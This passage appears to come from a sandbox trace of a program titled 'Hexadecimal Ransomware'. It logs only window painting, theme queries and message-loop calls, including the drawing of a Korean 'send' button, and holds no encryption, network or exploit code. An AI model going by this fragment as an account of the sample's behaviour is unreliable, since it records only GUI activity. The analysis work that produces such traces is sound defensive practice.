(color=0x0) returned 0x22100826 [0188.691] FillRect (hDC=0x15010830, lprc=0x11fded0, hbr=0x22100826) returned 1 [0188.691] DeleteObject (ho=0x22100826) returned 1 [0188.692] RestoreDC (hdc=0x15010830, nSavedDC=-1) returned 1 [0188.692] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0188.692] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0188.692] GetSystemMetrics (nIndex=42) returned 0 [0188.692] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0188.692] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0188.692] RestoreDC (hdc=0x15010830, nSavedDC=-1) returned 1 [0188.692] GdipReleaseDC (graphics=0x6e19d80, hdc=0x15010830) returned 0x0 [0188.692] IsAppThemed () returned 0x1 [0188.692] GetThemeAppProperties () returned 0x3 [0188.692] GetThemeAppProperties () returned 0x3 [0188.692] IsAppThemed () returned 0x1 [0188.692] GetThemeAppProperties () returned 0x3 [0188.693] GetThemeAppProperties () returned 0x3 [0188.693] IsThemePartDefined () returned 0x1 [0188.693] GdipCreateRegion (region=0x11fe454) returned 0x0 [0188.693] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0188.693] GdipCreateMatrix (matrix=0x11fe454) returned 0x0 [0188.693] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a0f0) returned 0x0 [0188.693] GdipIsMatrixIdentity (matrix=0x6e1a0f0, result=0x11fe46c) returned 0x0 [0188.693] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0188.693] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593ed8) returned 0x0 [0188.693] LocalFree (hMem=0x1593ed8) returned 0x0 [0188.693] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0188.693] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593c38) returned 0x0 [0188.693] LocalFree (hMem=0x1593c38) returned 0x0 [0188.693] GdipDeleteMatrix (matrix=0x6e1a0f0) returned 0x0 [0188.693] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe494) returned 0x0 [0188.694] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe484) returned 0x0 [0188.694] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe484) returned 0x0 [0188.694] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0188.694] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe49c) returned 0x0 [0188.694] GetCurrentObject (hdc=0x15010830, type=0x1) returned 0xb00017 [0188.694] GetCurrentObject (hdc=0x15010830, type=0x2) returned 0x900010 [0188.694] GetCurrentObject (hdc=0x15010830, type=0x7) returned 0xb050815 [0188.694] GetCurrentObject (hdc=0x15010830, type=0x6) returned 0x8a01c2 [0188.694] SaveDC (hdc=0x15010830) returned 1 [0188.694] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30040825 [0188.694] GetClipRgn (hdc=0x15010830, hrgn=0x30040825) returned 0 [0188.694] SelectClipRgn (hdc=0x15010830, hrgn=0x1d04081c) returned 2 [0188.694] DeleteObject (ho=0x30040825) returned 1 [0188.694] DeleteObject (ho=0x1d04081c) returned 1 [0188.694] OffsetViewportOrgEx (in: hdc=0x15010830, x=0, y=0, lppt=0x334c5d4 | out: lppt=0x334c5d4) returned 1 [0188.694] IsAppThemed () returned 0x1 [0188.695] GetThemeAppProperties () returned 0x3 [0188.695] GetThemeAppProperties () returned 0x3 [0188.695] DrawThemeBackground () returned 0x0 [0188.695] RestoreDC (hdc=0x15010830, nSavedDC=-1) returned 1 [0188.695] GdipReleaseDC (graphics=0x6e19d80, hdc=0x15010830) returned 0x0 [0188.695] GdipCreateRegion (region=0x11fe458) returned 0x0 [0188.695] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0188.695] GdipCreateMatrix (matrix=0x11fe458) returned 0x0 [0188.695] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0188.695] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe470) returned 0x0 [0188.695] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0188.695] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ed8) returned 0x0 [0188.695] LocalFree (hMem=0x1593ed8) returned 0x0 [0188.696] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0188.696] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ed8) returned 0x0 [0188.696] LocalFree (hMem=0x1593ed8) returned 0x0 [0188.696] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0188.696] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe498) returned 0x0 [0188.696] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe488) returned 0x0 [0188.696] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe488) returned 0x0 [0188.696] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0188.696] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe4a0) returned 0x0 [0188.696] GetCurrentObject (hdc=0x15010830, type=0x1) returned 0xb00017 [0188.696] GetCurrentObject (hdc=0x15010830, type=0x2) returned 0x900010 [0188.696] GetCurrentObject (hdc=0x15010830, type=0x7) returned 0xb050815 [0188.696] GetCurrentObject (hdc=0x15010830, type=0x6) returned 0x8a01c2 [0188.696] SaveDC (hdc=0x15010830) returned 1 [0188.696] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1e04081c [0188.696] GetClipRgn (hdc=0x15010830, hrgn=0x1e04081c) returned 0 [0188.697] SelectClipRgn (hdc=0x15010830, hrgn=0x31040825) returned 2 [0188.697] DeleteObject (ho=0x1e04081c) returned 1 [0188.697] DeleteObject (ho=0x31040825) returned 1 [0188.697] OffsetViewportOrgEx (in: hdc=0x15010830, x=0, y=0, lppt=0x334c8a8 | out: lppt=0x334c8a8) returned 1 [0188.697] IsAppThemed () returned 0x1 [0188.697] GetThemeAppProperties () returned 0x3 [0188.697] GetThemeAppProperties () returned 0x3 [0188.697] GetThemeBackgroundContentRect () returned 0x0 [0188.697] RestoreDC (hdc=0x15010830, nSavedDC=-1) returned 1 [0188.697] GdipReleaseDC (graphics=0x6e19d80, hdc=0x15010830) returned 0x0 [0188.697] IsAppThemed () returned 0x1 [0188.697] GetThemeAppProperties () returned 0x3 [0188.697] GetThemeAppProperties () returned 0x3 [0188.697] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe5d4) returned 0x0 [0188.697] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5c0) returned 0x0 [0188.697] GetCurrentObject (hdc=0x15010830, type=0x1) returned 0xb00017 [0188.698] GetCurrentObject (hdc=0x15010830, type=0x2) returned 0x900010 [0188.698] GetCurrentObject (hdc=0x15010830, type=0x7) returned 0xb050815 [0188.698] GetCurrentObject (hdc=0x15010830, type=0x6) returned 0x8a01c2 [0188.698] SaveDC (hdc=0x15010830) returned 1 [0188.698] GetTextAlign (hdc=0x15010830) returned 0x0 [0188.698] GetTextColor (hdc=0x15010830) returned 0x0 [0188.698] GetCurrentObject (hdc=0x15010830, type=0x6) returned 0x8a01c2 [0188.698] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe308 | out: pv=0x11fe308) returned 92 [0188.698] SelectObject (hdc=0x15010830, h=0x170a07ff) returned 0x8a01c2 [0188.698] GetBkMode (hdc=0x15010830) returned 2 [0188.699] SetBkMode (hdc=0x15010830, mode=1) returned 2 [0188.699] DrawTextExW (in: hdc=0x15010830, lpchText="전송하기", cchText=4, lprc=0x11fe3f0, format=0x2415, lpdtp=0x334cc48 | out: lpchText="전송하기", lprc=0x11fe3f0) returned 13 [0188.700] DrawTextExW (in: hdc=0x15010830, lpchText="전송하기", cchText=4, lprc=0x11fe554, format=0x2015, lpdtp=0x334cc48 | out: lpchText="전송하기", lprc=0x11fe554) returned 13 [0188.702] RestoreDC (hdc=0x15010830, nSavedDC=-1) returned 1 [0188.702] GdipReleaseDC (graphics=0x6e19d80, hdc=0x15010830) returned 0x0 [0188.702] GetFocus () returned 0x102d8 [0188.702] IsAppThemed () returned 0x1 [0188.702] GetThemeAppProperties () returned 0x3 [0188.702] GetThemeAppProperties () returned 0x3 [0188.702] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7a0) returned 0x0 [0188.702] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=64, cy=25, hdcSrc=0x15010830, x1=0, y1=0, rop=0xcc0020) returned 1 [0188.703] GdipReleaseDC (graphics=0x6e19d80, hdc=0x15010830) returned 0x0 [0188.703] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0188.703] SelectObject (hdc=0x15010830, h=0x85000f) returned 0xb050815 [0188.703] DeleteDC (hdc=0x15010830) returned 1 [0188.703] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0188.704] EndPaint (hWnd=0x102d8, lpPaint=0x11fe744) returned 1 [0188.704] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.704] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.704] WaitMessage () returned 1 [0188.835] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.835] GetMessageA (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.835] TranslateMessage (lpMsg=0x11fed00) returned 0 [0188.835] DispatchMessageA (lpMsg=0x11fed00) returned 0x0 [0188.835] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.835] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.835] WaitMessage () returned 1 [0188.853] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.853] IsWindowUnicode (hWnd=0x202e6) returned 1 [0188.853] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.853] TranslateMessage (lpMsg=0x11fed00) returned 0 [0188.853] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.855] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.855] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.855] WaitMessage () returned 1 [0188.857] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.857] IsWindowUnicode (hWnd=0x202e6) returned 1 [0188.857] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.857] TranslateMessage (lpMsg=0x11fed00) returned 0 [0188.857] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.862] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.862] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.862] WaitMessage () returned 1 [0188.940] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.941] IsWindowUnicode (hWnd=0x202e6) returned 1 [0188.941] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.941] TranslateMessage (lpMsg=0x11fed00) returned 0 [0188.941] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.942] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.943] IsWindowUnicode (hWnd=0x202e6) returned 1 [0188.943] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.943] TranslateMessage (lpMsg=0x11fed00) returned 0 [0188.943] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.943] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.943] IsWindowUnicode (hWnd=0x202e6) returned 1 [0188.943] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.943] TranslateMessage (lpMsg=0x11fed00) returned 0 [0188.943] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.943] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.944] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.944] WaitMessage () returned 1 [0188.945] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.945] IsWindowUnicode (hWnd=0x202e6) returned 1 [0188.945] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.946] TranslateMessage (lpMsg=0x11fed00) returned 0 [0188.946] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.947] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.948] IsWindowUnicode (hWnd=0x202e6) returned 1 [0188.948] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.948] TranslateMessage (lpMsg=0x11fed00) returned 0 [0188.948] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.948] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.948] IsWindowUnicode (hWnd=0x202e6) returned 1 [0188.948] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.948] TranslateMessage (lpMsg=0x11fed00) returned 0 [0188.948] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.948] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.949] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.949] WaitMessage () returned 1 [0188.979] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.979] IsWindowUnicode (hWnd=0x102ea) returned 1 [0188.979] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.979] TranslateMessage (lpMsg=0x11fed00) returned 0 [0188.979] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.979] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.979] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0188.979] WaitMessage () returned 1 [0193.697] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0193.698] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1f, wParam=0x0, lParam=0x0) returned 0x0 [0193.725] IsWindowUnicode (hWnd=0x102d8) returned 1 [0193.725] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0193.726] GetKeyState (nVirtKey=16) returned 0 [0193.726] GetKeyState (nVirtKey=17) returned 0 [0193.726] GetKeyState (nVirtKey=18) returned -127 [0193.726] SendMessageW (hWnd=0x102d8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x1 [0193.726] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x1 [0193.727] GetKeyState (nVirtKey=16) returned 0 [0193.727] GetKeyState (nVirtKey=17) returned 0 [0193.727] GetKeyState (nVirtKey=18) returned -127 [0193.729] TranslateMessage (lpMsg=0x11fed00) returned 1 [0193.729] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0193.729] GetKeyState (nVirtKey=16) returned 0 [0193.729] GetKeyState (nVirtKey=17) returned 0 [0193.729] GetKeyState (nVirtKey=18) returned -127 [0193.730] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x104, wParam=0x12, lParam=0x20380001) returned 0x0 [0193.730] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0193.733] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe900 | out: lpwndpl=0x11fe900) returned 1 [0193.733] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x47, wParam=0x0, lParam=0x11febd4) returned 0x0 [0193.733] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0193.733] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0193.747] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0193.765] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x1c, wParam=0x0, lParam=0xf70) returned 0x0 [0193.765] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1c, wParam=0x0, lParam=0xf70) returned 0x0 [0193.765] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0193.765] GetCapture () returned 0x0 [0193.765] InvalidateRect (hWnd=0x102d8, lpRect=0x0, bErase=0) returned 1 [0193.773] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0193.773] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0193.773] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0193.774] IsWindowUnicode (hWnd=0x102d8) returned 1 [0193.774] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0193.774] TranslateMessage (lpMsg=0x11fed00) returned 0 [0193.774] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0193.775] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0193.775] IsWindowUnicode (hWnd=0x102d8) returned 1 [0193.775] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0193.775] TranslateMessage (lpMsg=0x11fed00) returned 0 [0193.775] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0193.776] BeginPaint (in: hWnd=0x102d8, lpPaint=0x11fe748 | out: lpPaint=0x11fe748) returned 0x60100ce [0193.776] SelectPalette (hdc=0x60100ce, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0193.776] CreateCompatibleDC (hdc=0x60100ce) returned 0x8a01081f [0193.776] SelectObject (hdc=0x8a01081f, h=0xb050815) returned 0x85000f [0193.776] GdipCreateFromHDC (hdc=0x8a01081f, graphics=0x11fe760) returned 0x0 [0193.777] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0193.777] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=64, height=25, combineMode=0x0) returned 0x0 [0193.777] GdipCreateMatrix (matrix=0x11fe7a8) returned 0x0 [0193.777] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0193.777] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7c0) returned 0x0 [0193.777] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0193.777] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593c38) returned 0x0 [0193.778] LocalFree (hMem=0x1593c38) returned 0x0 [0193.778] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0193.778] GdipCreateRegion (region=0x11fe7a8) returned 0x0 [0193.778] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0193.778] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7b4) returned 0x0 [0193.778] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7e0) returned 0x0 [0193.778] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd8d0dbd) returned 0x0 [0193.778] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0193.778] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5cc) returned 0x0 [0193.778] GetCurrentObject (hdc=0x8a01081f, type=0x1) returned 0xb00017 [0193.778] GetCurrentObject (hdc=0x8a01081f, type=0x2) returned 0x900010 [0193.778] GetCurrentObject (hdc=0x8a01081f, type=0x7) returned 0xb050815 [0193.778] GetCurrentObject (hdc=0x8a01081f, type=0x6) returned 0x8a01c2 [0193.778] SaveDC (hdc=0x8a01081f) returned 1 [0193.779] GetNearestColor (hdc=0x8a01081f, color=0x0) returned 0x0 [0193.779] GetNearestColor (hdc=0x8a01081f, color=0x0) returned 0x0 [0193.779] GetNearestColor (hdc=0x8a01081f, color=0x0) returned 0x0 [0193.779] GetNearestColor (hdc=0x8a01081f, color=0x989898) returned 0x989898 [0193.779] GetNearestColor (hdc=0x8a01081f, color=0x0) returned 0x0 [0193.779] GetNearestColor (hdc=0x8a01081f, color=0x7f7f7f) returned 0x7f7f7f [0193.779] GetNearestColor (hdc=0x8a01081f, color=0x989898) returned 0x989898 [0193.779] GetNearestColor (hdc=0x8a01081f, color=0x0) returned 0x0 [0193.779] GetNearestColor (hdc=0x8a01081f, color=0x0) returned 0x0 [0193.779] RestoreDC (hdc=0x8a01081f, nSavedDC=-1) returned 1 [0193.779] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8a01081f) returned 0x0 [0193.779] IsAppThemed () returned 0x1 [0193.779] GetThemeAppProperties () returned 0x3 [0193.780] GetThemeAppProperties () returned 0x3 [0193.780] IsAppThemed () returned 0x1 [0193.780] GetThemeAppProperties () returned 0x3 [0193.780] GetThemeAppProperties () returned 0x3 [0193.780] DrawTextExW (in: hdc=0x450107b6, lpchText="전송하기", cchText=4, lprc=0x11fe488, format=0x2415, lpdtp=0x334d6f4 | out: lpchText="전송하기", lprc=0x11fe488) returned 13 [0193.782] IsAppThemed () returned 0x1 [0193.782] GetThemeAppProperties () returned 0x3 [0193.782] GetThemeAppProperties () returned 0x3 [0193.782] IsAppThemed () returned 0x1 [0193.782] GetThemeAppProperties () returned 0x3 [0193.782] GetThemeAppProperties () returned 0x3 [0193.782] GetFocus () returned 0x0 [0193.782] IsAppThemed () returned 0x1 [0193.782] GetThemeAppProperties () returned 0x3 [0193.782] GetThemeAppProperties () returned 0x3 [0193.782] IsAppThemed () returned 0x1 [0193.782] GetThemeAppProperties () returned 0x3 [0193.782] GetThemeAppProperties () returned 0x3 [0193.782] IsThemePartDefined () returned 0x1 [0193.782] IsAppThemed () returned 0x1 [0193.782] GetThemeAppProperties () returned 0x3 [0193.782] GetThemeAppProperties () returned 0x3 [0193.783] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0193.783] IsAppThemed () returned 0x1 [0193.783] GetThemeAppProperties () returned 0x3 [0193.783] GetThemeAppProperties () returned 0x3 [0193.783] IsAppThemed () returned 0x1 [0193.783] GetThemeAppProperties () returned 0x3 [0193.783] GetThemeAppProperties () returned 0x3 [0193.783] IsThemePartDefined () returned 0x1 [0193.783] GdipCreateRegion (region=0x11fe4d0) returned 0x0 [0193.783] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0193.783] GdipCreateMatrix (matrix=0x11fe4d0) returned 0x0 [0193.783] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0193.783] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe4e8) returned 0x0 [0193.783] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0193.783] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ae8) returned 0x0 [0193.783] LocalFree (hMem=0x1593ae8) returned 0x0 [0193.787] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0193.787] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593c38) returned 0x0 [0193.787] LocalFree (hMem=0x1593c38) returned 0x0 [0193.787] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0193.787] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe510) returned 0x0 [0193.787] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe500) returned 0x0 [0193.787] GdipGetRegionHRgn (region=0x6e1a090, graphics=0x6e19d80, hRgn=0x11fe500) returned 0x0 [0193.787] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0193.787] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe518) returned 0x0 [0193.790] GetCurrentObject (hdc=0x8a01081f, type=0x1) returned 0xb00017 [0193.790] GetCurrentObject (hdc=0x8a01081f, type=0x2) returned 0x900010 [0193.790] GetCurrentObject (hdc=0x8a01081f, type=0x7) returned 0xb050815 [0193.790] GetCurrentObject (hdc=0x8a01081f, type=0x6) returned 0x8a01c2 [0193.790] SaveDC (hdc=0x8a01081f) returned 1 [0193.790] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x32040825 [0193.790] GetClipRgn (hdc=0x8a01081f, hrgn=0x32040825) returned 0 [0193.790] SelectClipRgn (hdc=0x8a01081f, hrgn=0x2204081c) returned 2 [0193.790] DeleteObject (ho=0x32040825) returned 1 [0193.790] DeleteObject (ho=0x2204081c) returned 1 [0193.790] OffsetViewportOrgEx (in: hdc=0x8a01081f, x=0, y=0, lppt=0x334dda4 | out: lppt=0x334dda4) returned 1 [0193.791] DrawThemeParentBackground () returned 0x0 [0193.791] 